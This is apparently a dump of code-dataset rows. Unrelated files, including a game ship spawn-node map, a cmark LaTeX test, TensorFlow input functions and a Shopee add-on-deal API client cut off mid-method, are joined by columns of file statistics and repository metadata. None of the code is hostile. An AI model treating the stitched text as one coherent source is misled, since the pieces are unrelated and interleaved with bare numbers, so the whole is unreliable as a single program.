objectStruct = {'Objects': {'1189038450.53gjeon': {'Type': 'Ship Part', 'Name': 'shipNavyMerchant1', 'Category': '11: Light Galleon', 'File': '', 'Flagship': False, 'Objects': {'1189038939.53gjeon': {'Type': 'Spawn Node', 'Aggro Radius': '12.0000', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(-0.076, 5.03, 19.518), 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Area', 'Start State': 'Patrol', 'Team': '2', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1189039087.17gjeon': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(-10.6, 17.813, 19.902), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1189039094.02gjeon': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(10.578, 17.868, 19.904), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1189039108.98gjeon': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(-11.112, -5.737, 19.199), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1189039114.83gjeon': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(9.664, -5.361, 19.21), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1189039147.55gjeon': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(-11.571, 37.148, 31.22), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1189039158.58gjeon': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(-18.083, 52.753, 29.735), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1189039162.2gjeon': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(18.445, 53.221, 29.7), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1189039165.75gjeon': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(11.591, 37.232, 31.221), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1189039173.88gjeon': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(-8.814, -36.65, 37.263), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1189039178.27gjeon': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(9.379, -36.475, 37.244), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1189039433.22gjeon': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(0.451, 44.859, 30.496), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}}, 'Respawns': True, 'Team': 'EvilNavy', 'Visual': {'Model': ['models/shipparts/merchantL1-geometry_High', 'models/shipparts/merchantL1-collisions', 'models/shipparts/merchantCabinAL1-collisions', 'models/shipparts/merchantCabinAL1-geometry_High']}}}, 'Node Links': [['1189039087.17gjeon', '1189038939.53gjeon', 'Bi-directional'], ['1189039087.17gjeon', '1189039147.55gjeon', 'Bi-directional'], ['1189039158.58gjeon', '1189039147.55gjeon', 'Bi-directional'], ['1189039162.2gjeon', '1189039158.58gjeon', 'Bi-directional'], ['1189039165.75gjeon', '1189039162.2gjeon', 'Bi-directional'], ['1189039165.75gjeon', '1189039094.02gjeon', 'Bi-directional'], ['1189039114.83gjeon', '1189039094.02gjeon', 'Bi-directional'], ['1189039114.83gjeon', '1189039178.27gjeon', 'Bi-directional'], ['1189039114.83gjeon', '1189039108.98gjeon', 'Bi-directional'], ['1189038939.53gjeon', '1189039094.02gjeon', 'Bi-directional'], ['1189039173.88gjeon', '1189039108.98gjeon', 'Bi-directional'], ['1189039087.17gjeon', '1189039108.98gjeon', 'Bi-directional'], ['1189039433.22gjeon', '1189039147.55gjeon', 'Bi-directional'], ['1189039433.22gjeon', '1189039165.75gjeon', 'Bi-directional']], 'Layers': {}, 'ObjectIds': {'1189038450.53gjeon': '["Objects"]["1189038450.53gjeon"]', '1189038939.53gjeon': '["Objects"]["1189038450.53gjeon"]["Objects"]["1189038939.53gjeon"]', '1189039087.17gjeon': '["Objects"]["1189038450.53gjeon"]["Objects"]["1189039087.17gjeon"]', '1189039094.02gjeon': '["Objects"]["1189038450.53gjeon"]["Objects"]["1189039094.02gjeon"]', '1189039108.98gjeon': '["Objects"]["1189038450.53gjeon"]["Objects"]["1189039108.98gjeon"]', '1189039114.83gjeon': '["Objects"]["1189038450.53gjeon"]["Objects"]["1189039114.83gjeon"]', '1189039147.55gjeon': '["Objects"]["1189038450.53gjeon"]["Objects"]["1189039147.55gjeon"]', '1189039158.58gjeon': '["Objects"]["1189038450.53gjeon"]["Objects"]["1189039158.58gjeon"]', '1189039162.2gjeon': '["Objects"]["1189038450.53gjeon"]["Objects"]["1189039162.2gjeon"]', '1189039165.75gjeon': '["Objects"]["1189038450.53gjeon"]["Objects"]["1189039165.75gjeon"]', '1189039173.88gjeon': '["Objects"]["1189038450.53gjeon"]["Objects"]["1189039173.88gjeon"]', '1189039178.27gjeon': '["Objects"]["1189038450.53gjeon"]["Objects"]["1189039178.27gjeon"]', '1189039433.22gjeon': '["Objects"]["1189038450.53gjeon"]["Objects"]["1189039433.22gjeon"]'}}
| 1,024.166667
| 5,860
| 0.646705
| 848
| 6,145
| 4.683962
| 0.198113
| 0.036757
| 0.037009
| 0.036254
| 0.394763
| 0.389225
| 0.365559
| 0.365559
| 0.357503
| 0.347432
| 0
| 0.264382
| 0.083483
| 6,145
| 6
| 5,860
| 1,024.166667
| 0.440874
| 0.03629
| 0
| 0
| 0
| 0
| 0.59243
| 0.167962
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
e86196619c3d23a6d1028c9ec3a493690afaf4be
| 36
|
py
|
Python
|
researchutils/math/__init__.py
|
keio-ytlab/researchutils
|
bb3ec467386d43a1e2282ec6d024216ce4dae841
|
[
"MIT"
] | 1
|
2018-10-25T12:57:38.000Z
|
2018-10-25T12:57:38.000Z
|
researchutils/math/__init__.py
|
yuishihara/researchutils
|
bb3ec467386d43a1e2282ec6d024216ce4dae841
|
[
"MIT"
] | 28
|
2018-08-25T03:54:30.000Z
|
2018-10-14T12:09:47.000Z
|
researchutils/math/__init__.py
|
yuishihara/researchutils
|
bb3ec467386d43a1e2282ec6d024216ce4dae841
|
[
"MIT"
] | null | null | null |
from researchutils.math import angle
| 36
| 36
| 0.888889
| 5
| 36
| 6.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 36
| 1
| 36
| 36
| 0.969697
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
e869fec795149b024e8225e9b1c19c0606878796
| 8,623
|
py
|
Python
|
tests/test_to_latex.py
|
andersjel/paka.cmark
|
366d7bbc976ef07876404b1d07a2c573cd256aa3
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_to_latex.py
|
andersjel/paka.cmark
|
366d7bbc976ef07876404b1d07a2c573cd256aa3
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_to_latex.py
|
andersjel/paka.cmark
|
366d7bbc976ef07876404b1d07a2c573cd256aa3
|
[
"BSD-3-Clause"
] | 1
|
2021-04-10T03:54:28.000Z
|
2021-04-10T03:54:28.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import unittest
class ToLatexTest(unittest.TestCase):
SAMPLE = (
"My humble mentoring experience tells me something about learning "
"programming. For complete beginners, it may be easier to learn "
"some kind of Lisp, and then transition to Python for more “real "
"world” code.\nOf course, various Lisps are used in production in "
"various companies in various projects, but Python is just more "
"popular.\n\nOne mentoree really understood object-oriented "
"programming (OOP) only after learning it with Racket, which is "
"usually characterized as “dialect of Scheme” (functional "
"language).\nMaybe it has something to do with syntax not getting "
"on beginner’s way :)\n\nПроверка---\"test\" -- test.")
def setUp(self):
from paka.cmark import LineBreaks, to_latex
self.func = to_latex
self.line_breaks = LineBreaks
def check(self, source, expected, **kwargs):
self.assertEqual(self.func(source, **kwargs), expected)
def test_empty(self):
self.check("", "\n")
def test_newline(self):
self.check("\n", "\n")
def test_hello_world(self):
self.check("Hello, Noob!\n", "Hello, Noob!\n")
def test_list(self):
expected = (
"\\begin{itemize}\n"
"\\item a\n\n"
"\\item b\n\n"
"\\end{itemize}\n")
self.check(" * a\n * b\n", expected)
def test_no_breaks_and_width(self):
expected = (
"My humble mentoring experience tells me something about "
"learning programming. For complete beginners, it may be easier "
"to learn some kind of Lisp, and then transition to Python for "
"more ``real world'' code. Of course, various Lisps are "
"used in production in various companies in various projects, "
"but Python is just more popular.\n\n"
"One mentoree really understood object-oriented programming "
"(OOP) only after learning it with Racket, which is usually "
"characterized as ``dialect of Scheme'' (functional language"
"). Maybe it has something to do with syntax not "
"getting on beginner's way :)\n\nПроверка-{}-{}-\\textquotedbl{}"
"test\\textquotedbl{} -{}- test.\n")
self.check(self.SAMPLE, expected)
self.check(self.SAMPLE, expected, breaks=False)
self.check(self.SAMPLE, expected, breaks=False, width=0)
self.check(self.SAMPLE, expected, breaks=False, width=7)
def test_hard_breaks_and_zero_width(self):
expected = (
"My humble mentoring experience tells me something about "
"learning programming. For complete beginners, it may be easier "
"to learn some kind of Lisp, and then transition to Python for "
"more ``real world'' code.\\\\\n"
"Of course, various Lisps are used in production in various "
"companies in various projects, but Python is just more "
"popular.\n\n"
"One mentoree really understood object-oriented programming "
"(OOP) only after learning it with Racket, which is usually "
"characterized as ``dialect of Scheme'' (functional language"
").\\\\\n"
"Maybe it has something to do with syntax not getting on "
"beginner's way :)\n\nПроверка-{}-{}-\\textquotedbl{}test"
"\\textquotedbl{} -{}- test.\n")
self.check(self.SAMPLE, expected, breaks="hard")
self.check(self.SAMPLE, expected, breaks=self.line_breaks.hard)
self.check(
self.SAMPLE, expected, breaks=self.line_breaks.hard, width=0)
def test_hard_breaks_and_non_zero_width(self):
expected = (
"My\nhumble\nmentoring\nexperience\ntells\nme\nsomething\n"
"about\nlearning\nprogramming.\nFor\ncomplete\nbeginners,"
"\nit may\nbe\neasier\nto\nlearn\nsome\nkind of\nLisp,"
"\nand\nthen\ntransition\nto\nPython\nfor\nmore\n``real\n"
"world''\ncode.\\\\\n"
"Of\ncourse,\nvarious\nLisps\nare\nused in\n"
"production\nin\nvarious\ncompanies\nin\nvarious\n"
"projects,\nbut\nPython\nis just\nmore\npopular.\n\n"
"One\nmentoree\nreally\nunderstood\nobject-oriented\n"
"programming\n(OOP)\nonly\nafter\nlearning\nit with"
"\nRacket,\nwhich\nis\nusually\ncharacterized\nas\n"
"``dialect\nof\nScheme''\n(functional\nlanguage).\\\\\n"
"Maybe\nit has\nsomething\nto do\nwith\nsyntax\nnot"
"\ngetting\non\nbeginner's\nway\n:)\n\nПроверка-{}-{}-"
"\\textquotedbl{}test\\textquotedbl{}\n-{}-\ntest.\n")
width = 7
self.check(self.SAMPLE, expected, breaks="hard", width=width)
self.check(
self.SAMPLE, expected, breaks=self.line_breaks.hard,
width=width)
def test_soft_breaks_and_zero_width(self):
expected = (
"My humble mentoring experience tells me something about "
"learning programming. For complete beginners, it may be easier "
"to learn some kind of Lisp, and then transition to Python for "
"more ``real world'' code.\nOf course, various Lisps are "
"used in production in various companies in various projects, "
"but Python is just more popular.\n\n"
"One mentoree really understood object-oriented programming "
"(OOP) only after learning it with Racket, which is usually "
"characterized as ``dialect of Scheme'' (functional "
"language).\nMaybe it has something to do with syntax not "
"getting on beginner's way :)\n\nПроверка-{}-{}-\\textquotedbl{}"
"test\\textquotedbl{} -{}- test.\n")
self.check(self.SAMPLE, expected, breaks=True)
self.check(self.SAMPLE, expected, breaks="soft")
self.check(self.SAMPLE, expected, breaks=self.line_breaks.soft)
self.check(self.SAMPLE, expected, breaks=True, width=0)
def test_soft_breaks_and_non_zero_width(self):
expected = (
"My\nhumble\nmentoring\nexperience\ntells\nme\nsomething\n"
"about\nlearning\nprogramming.\nFor\ncomplete\nbeginners,"
"\nit may\nbe\neasier\nto\nlearn\nsome\nkind of\nLisp,"
"\nand\nthen\ntransition\nto\nPython\nfor\nmore\n``real\n"
"world''\ncode.\nOf\ncourse,\nvarious\nLisps\nare\nused in\n"
"production\nin\nvarious\ncompanies\nin\nvarious\n"
"projects,\nbut\nPython\nis just\nmore\npopular.\n\n"
"One\nmentoree\nreally\nunderstood\nobject-oriented\n"
"programming\n(OOP)\nonly\nafter\nlearning\nit with"
"\nRacket,\nwhich\nis\nusually\ncharacterized\nas\n"
"``dialect\nof\nScheme\''\n(functional\nlanguage).\n"
"Maybe\nit has\nsomething\nto do\nwith\nsyntax\nnot"
"\ngetting\non\nbeginner's\nway\n:)\n\nПроверка-{}-{}-"
"\\textquotedbl{}test\\textquotedbl{}\n-{}-\ntest.\n")
width = 7
self.check(self.SAMPLE, expected, breaks=True, width=width)
self.check(self.SAMPLE, expected, breaks="soft", width=width)
self.check(
self.SAMPLE, expected, breaks=self.line_breaks.soft, width=width)
def test_no_breaks_and_smart(self):
expected = (
"My humble mentoring experience tells me something about "
"learning programming. For complete beginners, it may be easier "
"to learn some kind of Lisp, and then transition to Python for "
"more ``real world'' code. Of course, various Lisps are "
"used in production in various companies in various projects, "
"but Python is just more popular.\n\n"
"One mentoree really understood object-oriented programming "
"(OOP) only after learning it with Racket, which is usually "
"characterized as ``dialect of Scheme'' (functional language"
"). Maybe it has something to do with syntax not "
"getting on beginner's way :)\n\nПроверка---``test'' -- test.\n")
self.check(self.SAMPLE, expected, smart=True)
self.check(self.SAMPLE, expected, breaks=False, smart=True)
self.check(self.SAMPLE, expected, breaks=False, width=0, smart=True)
self.check(self.SAMPLE, expected, breaks=False, width=7, smart=True)
| 51.327381
| 77
| 0.624029
| 1,060
| 8,623
| 5.031132
| 0.174528
| 0.040503
| 0.048753
| 0.071254
| 0.909057
| 0.894056
| 0.894056
| 0.874367
| 0.855803
| 0.830114
| 0
| 0.001402
| 0.25548
| 8,623
| 167
| 78
| 51.634731
| 0.829283
| 0.002435
| 0
| 0.489933
| 0
| 0
| 0.558837
| 0.173605
| 0
| 0
| 0
| 0
| 0.006711
| 1
| 0.080537
| false
| 0
| 0.020134
| 0
| 0.114094
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2cdc0c9ee017840f8d96f7a181b4e58c0fbc0538
| 204
|
py
|
Python
|
source/utilities/directories.py
|
mfc2496/EyeSee-Server
|
fbe146fd6397a2312d95a335bbf7893d03af8a57
|
[
"MIT"
] | null | null | null |
source/utilities/directories.py
|
mfc2496/EyeSee-Server
|
fbe146fd6397a2312d95a335bbf7893d03af8a57
|
[
"MIT"
] | null | null | null |
source/utilities/directories.py
|
mfc2496/EyeSee-Server
|
fbe146fd6397a2312d95a335bbf7893d03af8a57
|
[
"MIT"
] | 1
|
2021-09-09T14:18:45.000Z
|
2021-09-09T14:18:45.000Z
|
# Hassan's Directory
# project_path = 'C:\\Users\\Hassan Javaid\\PycharmProjects\\EyeSee-Server\\'
# Mahnoor's Directory
project_path = 'C:\\Users\\Mahnoor Fatima Saad\\PycharmProjects\\EyeSee-Server\\'
| 34
| 81
| 0.745098
| 25
| 204
| 6
| 0.56
| 0.133333
| 0.226667
| 0.28
| 0.36
| 0.36
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 204
| 5
| 82
| 40.8
| 0.802139
| 0.558824
| 0
| 0
| 0
| 0
| 0.744186
| 0.44186
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
fa6a39f15bcd762973daa038a8ce1e9300b64b08
| 226
|
py
|
Python
|
importtest.py
|
hvy/chainer-mnist
|
74e6b3ad12611b91b9aa8bd6d087a6ac4d22702b
|
[
"MIT"
] | null | null | null |
importtest.py
|
hvy/chainer-mnist
|
74e6b3ad12611b91b9aa8bd6d087a6ac4d22702b
|
[
"MIT"
] | null | null | null |
importtest.py
|
hvy/chainer-mnist
|
74e6b3ad12611b91b9aa8bd6d087a6ac4d22702b
|
[
"MIT"
] | null | null | null |
import numpy as np
import chainer
from chainer import cuda, Function, gradient_check, Variable, optimizers, serializers, utils
from chainer import Link, Chain, ChainList
import chainer.functions as F
import chainer.links as L
| 32.285714
| 92
| 0.823009
| 33
| 226
| 5.606061
| 0.636364
| 0.210811
| 0.183784
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.132743
| 226
| 6
| 93
| 37.666667
| 0.943878
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d7269c94ee1a4f8636ae155ec59ef93c69d4d26f
| 77
|
py
|
Python
|
lectures/code/dict_duplicate_keys.py
|
naskoch/python_course
|
84adfd3f8d48ca3ad5837f7acc59d2fa051e95d3
|
[
"MIT"
] | 4
|
2015-08-10T17:46:55.000Z
|
2020-04-18T21:09:03.000Z
|
lectures/code/dict_duplicate_keys.py
|
naskoch/python_course
|
84adfd3f8d48ca3ad5837f7acc59d2fa051e95d3
|
[
"MIT"
] | null | null | null |
lectures/code/dict_duplicate_keys.py
|
naskoch/python_course
|
84adfd3f8d48ca3ad5837f7acc59d2fa051e95d3
|
[
"MIT"
] | 2
|
2019-04-24T03:31:02.000Z
|
2019-05-13T07:36:06.000Z
|
>>> d = {1: 'one', 2: 'two'}
>>> d[1] = 'three'
>>> d
{1: 'three', 2: 'two'}
| 15.4
| 28
| 0.350649
| 13
| 77
| 2.076923
| 0.461538
| 0.222222
| 0.518519
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 0.220779
| 77
| 4
| 29
| 19.25
| 0.366667
| 0
| 0
| 0
| 0
| 0
| 0.246753
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d778776a6b4fda3682673516277f8c71f3b475b0
| 5,099
|
py
|
Python
|
model/tfrecord_input_fn.py
|
jireh-father/tensorflow-triplet-loss
|
c8a3b3efbf4c68f63d58ee3bedaa8e42451f6a80
|
[
"MIT"
] | null | null | null |
model/tfrecord_input_fn.py
|
jireh-father/tensorflow-triplet-loss
|
c8a3b3efbf4c68f63d58ee3bedaa8e42451f6a80
|
[
"MIT"
] | null | null | null |
model/tfrecord_input_fn.py
|
jireh-father/tensorflow-triplet-loss
|
c8a3b3efbf4c68f63d58ee3bedaa8e42451f6a80
|
[
"MIT"
] | null | null | null |
"""Create the input data pipeline using `tf.data`"""
from model import tfrecords_dataset as td
import tensorflow as tf
def train_input_fn(data_dir, params):
"""Train input function for the MNIST dataset.
Args:
data_dir: (string) path to the data directory
params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)
"""
dataset = td.train(data_dir)
# if hasattr(params, "shuffle_rand_seed"):
# shuffle_rand_seed = params.shuffle_rand_seed
# else:
# shuffle_rand_seed = 1
# import tensorflow as tf
# shuffle_rand_seed_ph = tf.placeholder(tf.int64, ())
dataset = dataset.shuffle(1000) # whole dataset into the buffer
dataset = dataset.repeat(
params.num_epochs) # r epeat for multiple epochs
dataset = dataset.batch(params.batch_size)
dataset = dataset.prefetch(params.batch_size) # make sure you always have one batch ready to serve
return dataset # , shuffle_rand_seed_ph
def train_input_fn_once(data_dir, params):
"""Train input function for the MNIST dataset.
Args:
data_dir: (string) path to the data directory
params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)
"""
dataset = td.train(data_dir)
dataset = dataset.batch(params.batch_size)
return dataset
def test_input_fn(data_dir, params):
"""Test input function for the MNIST dataset.
Args:
data_dir: (string) path to the data directory
params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)
"""
dataset = td.test(data_dir)
dataset = dataset.batch(params.batch_size)
dataset = dataset.prefetch(params.batch_size) # make sure you always have one batch ready to serve
return dataset
def query_input_fn(data_dir, params):
"""Test input function for the MNIST dataset.
Args:
data_dir: (string) path to the data directory
params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)
"""
dataset = td.query(data_dir)
dataset = dataset.batch(params.batch_size)
# dataset = dataset.prefetch(params.batch_size) # make sure you always have one batch ready to serve
return dataset
def index_input_fn(data_dir, params):
"""Test input function for the MNIST dataset.
Args:
data_dir: (string) path to the data directory
params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)
"""
dataset = td.index(data_dir)
dataset = dataset.batch(params.batch_size)
# dataset = dataset.prefetch(params.batch_size) # make sure you always have one batch ready to serve
return dataset
def train_label_fn(data_dir, params):
"""Test input function for the MNIST dataset.
Args:
data_dir: (string) path to the data directory
params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)
"""
dataset = td.train_label(data_dir)
dataset = dataset.batch(params.train_size)
# dataset = dataset.prefetch(params.batch_size) # make sure you always have one batch ready to serve
return dataset
def test_label_fn(data_dir, params):
"""Test input function for the MNIST dataset.
Args:
data_dir: (string) path to the data directory
params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)
"""
dataset = td.test_label(data_dir)
dataset = dataset.batch(params.eval_size)
# dataset = dataset.prefetch(params.batch_size) # make sure you always have one batch ready to serve
return dataset
def count_records(tfrecord_filenames):
c = 0
for fn in tfrecord_filenames:
for _ in tf.python_io.tf_record_iterator(fn):
c += 1
return c
def query_label_fn(data_dir, params):
"""Test input function for the MNIST dataset.
Args:
data_dir: (string) path to the data directory
params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)
"""
dataset, files = td.query_label(data_dir)
cnt = count_records(files)
dataset = dataset.batch(cnt)
# dataset = dataset.prefetch(params.batch_size) # make sure you always have one batch ready to serve
return dataset, cnt
def index_label_fn(data_dir, params):
"""Test input function for the MNIST dataset.
Args:
data_dir: (string) path to the data directory
params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)
"""
dataset, files = td.index_label(data_dir)
cnt = count_records(files)
dataset = dataset.batch(cnt)
# dataset = dataset.prefetch(params.batch_size) # make sure you always have one batch ready to serve
return dataset, cnt
| 36.421429
| 361
| 0.651893
| 662
| 5,099
| 4.871601
| 0.125378
| 0.058605
| 0.060465
| 0.053023
| 0.823876
| 0.821705
| 0.821705
| 0.79876
| 0.788217
| 0.788217
| 0
| 0.002406
| 0.266327
| 5,099
| 139
| 362
| 36.683453
| 0.859663
| 0.586978
| 0
| 0.431373
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.196078
| false
| 0
| 0.039216
| 0
| 0.431373
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d78a489a83fed4173997c92bf9c5c4b7951b7bb8
| 4,623
|
py
|
Python
|
pyshopee2/addondeal.py
|
tjengbudi/python-shopee
|
a74e99e7a900ed0a3c0cba2b7405238acf2ee16c
|
[
"MIT"
] | 166
|
2018-04-25T16:43:30.000Z
|
2022-03-20T07:07:39.000Z
|
pyshopee2/addondeal.py
|
tjengbudi/python-shopee
|
a74e99e7a900ed0a3c0cba2b7405238acf2ee16c
|
[
"MIT"
] | 34
|
2018-11-27T02:56:08.000Z
|
2022-01-28T05:24:57.000Z
|
pyshopee2/addondeal.py
|
tjengbudi/python-shopee
|
a74e99e7a900ed0a3c0cba2b7405238acf2ee16c
|
[
"MIT"
] | 62
|
2018-06-12T02:53:34.000Z
|
2022-03-13T07:31:34.000Z
|
from .base import BaseModule
class AddonDeal(BaseModule):
def add_add_on_deal(self, **kwargs):
"""
Add Add-on Deal
.
:param kwargs:
- add_on_deal_name Required
- start_time Required
- end_time Required
- promotion_type Required
- purchase_min_spend
- per_gift_num
- promotion_purchase_limit
"""
return self.client.execute("add_on_deal/add_add_on_deal", "POST", kwargs)
def add_add_on_deal_main_item(self, **kwargs):
"""
Add Add-on Deal Main Item
.
:param kwargs:
- add_on_deal_id Required
- main_item_list Required
- item_id Required
- status Required
"""
return self.client.execute("add_on_deal/add_add_on_deal_main_item", "POST", kwargs)
def add_add_on_deal_sub_item(self, **kwargs):
"""
Add Add-on Deal Sub Item
:param kwargs:
- add_on_deal_id Required
- sub_item_list Required
- item_id
- model_id
- status
- sub_item_input_price
- sub_item_limit
"""
return self.client.execute("add_on_deal/add_add_on_deal_sub_item", "POST", kwargs)
def delete_add_on_deal(self, **kwargs):
"""
Delete Add-on Deal
:param kwargs:
- add_on_deal_id Required
"""
return self.client.execute("add_on_deal/delete_add_on_deal", "POST", kwargs)
def delete_add_on_deal_main_item(self, **kwargs):
"""
Delete Add-on Deal Main Item
:param kwargs:
- add_on_deal_id Required
- main_item_list Required
"""
return self.client.execute("add_on_deal/delete_add_on_deal_main_item", "POST", kwargs)
def delete_add_on_deal_sub_item(self, **kwargs):
"""
Delete Add-on Deal Sub Item
:param kwargs:
- add_on_deal_id Required
- sub_item_list Required
- item_id
- model_id
"""
return self.client.execute("add_on_deal/delete_add_on_deal_sub_item", "POST", kwargs)
def get_add_on_deal_list(self, **kwargs):
"""
Get Add-on Deal List
:param kwargs:
- promotion_status Required
- page_no
- page_size
"""
return self.client.execute("add_on_deal/get_add_on_deal_list", "GET", kwargs)
def get_add_on_deal(self, **kwargs):
"""
Get Add-on Deal
:param kwargs:
- add_on_deal_id Required
"""
return self.client.execute("add_on_deal/get_add_on_deal", "GET", kwargs)
def get_add_on_deal_main_item(self, **kwargs):
"""
Get Add-on Deal Main Item
:param kwargs:
- add_on_deal_id Required
"""
return self.client.execute("add_on_deal/get_add_on_deal_main_item", "GET", kwargs)
def get_add_on_deal_sub_item(self, **kwargs):
"""
Get Add-on Deal Sub Item
:param kwargs:
- add_on_deal_id Required
"""
return self.client.execute("add_on_deal/get_add_on_deal_sub_item", "GET", kwargs)
def update_add_on_deal(self, **kwargs):
"""
Update Add-on Deal
:param kwargs:
- add_on_deal_id Required
- start_time
- end_time
